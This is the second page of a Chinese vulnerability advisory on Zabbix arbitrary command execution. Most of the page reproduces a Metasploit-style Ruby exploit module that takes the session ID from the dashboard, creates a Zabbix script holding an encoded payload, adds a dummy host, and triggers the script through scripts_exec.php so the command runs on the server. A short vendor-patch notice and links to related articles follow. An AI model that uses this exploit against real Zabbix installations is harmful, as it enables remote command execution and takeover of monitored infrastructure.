Zabbix任意命令执行漏洞(CVE(2)

dash = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/dashboard.php'),
      'cookie' => sess
    })

if !dash or dash.code != 200
      fail_with("Dashboard failed")
    end

sid = ''
    dash.body.each_line do |line|
      if line =~ /&sid=(.{16})\">/
        sid = $1
        break
      end
    end

if sid == ''
      fail_with("Could not get sid")
    end

script_title = rand_text_alpha(18)
    post = {
      'sid' => sid,
      'form_refresh' => 3,
      'form' => 'Create+script',
      'name' => script_title,
      'type' => 0,
      'execute_on' => 1,
      'command' => payload.encoded,
      'commandipmi' => '',
      'description' => '',
      'usrgrpid' => 0,
      'groupid' => 0,
      'access' => 2,
      'save' => 'Save'
    }

resp = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/scripts.php'),
      'vars_post' => post,
      'cookie' => sess
    })

if !resp or resp.code != 200
      fail_with("Error creating script")
    end

script_id = ''
    if resp.body =~ /scriptid=(\d{1,8})&sid=#{sid}\">#{script_title}/
      script_id = $1
    else
      fail_with("Could not get the script id")
    end

host = rand_text_alpha(18)
    post = {
      'sid' => sid,
      'form_refresh' => 1,
      'form' => 'Create+host',
      'host' => host,
      'visiblename' => host,
      'groups_left' => 4,
      'newgroup' => '',
      'interfaces[1][isNew]' => true,
      'interfaces[1][interfaceid]' => 1,
      'interfaces[1][type]' => 1,
      'interfaces[1][ip]' => '127.0.0.1',
      'interfaces[1][dns]' => '',
      'interfaces[1][useip]' => 1,
      'interfaces[1][port]' => 10050,
      'mainInterfaces[1]' => 1,
      'proxy_hostid' => 0,
      'status' => 0,
      'ipmi_authtype' => -1,
      'ipmi_privilege' => 2,
      'ipmi_username' => '',
      'ipmi_password' => '',
      'macros[0][macro]' => '',
      'macros[0][value]' => '',
      'inventory_mode' => -1,
      'save' => 'Save',
      'groups[4]' => 4
    }

resp = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/hosts.php'),
      'vars_post' => post,
      'cookie' => sess
    })

if !resp or resp.code != 200
      fail_with("Error creating new host")
    end

hostid = ''
    if resp.body =~ /hosts.php\?form=update&hostid=(\d{1,12})&groupid=(\d)&sid=#{sid}\">#{host}/
      hostid = $1
    else
      fail_with("Could not get the host id")
    end

send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "/scripts_exec.php?execute=1&hostid=#{hostid}&scriptid=#{script_id}&sid=#{sid}"),
      'cookie' => sess
    })
  end
end

建议：
--------------------------------------------------------------------------------
厂商补丁：

ZABBIX
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

ZABBIX 的详细介绍：请点这里
ZABBIX 的下载地址：请点这里

相关阅读：

安装部署分布式监控系统Zabbix 2.06

《安装部署分布式监控系统Zabbix 2.06》

CentOS 6.3下Zabbix安装部署

Zabbix分布式监控系统实践

CentOS 6.3下Zabbix监控apache server-status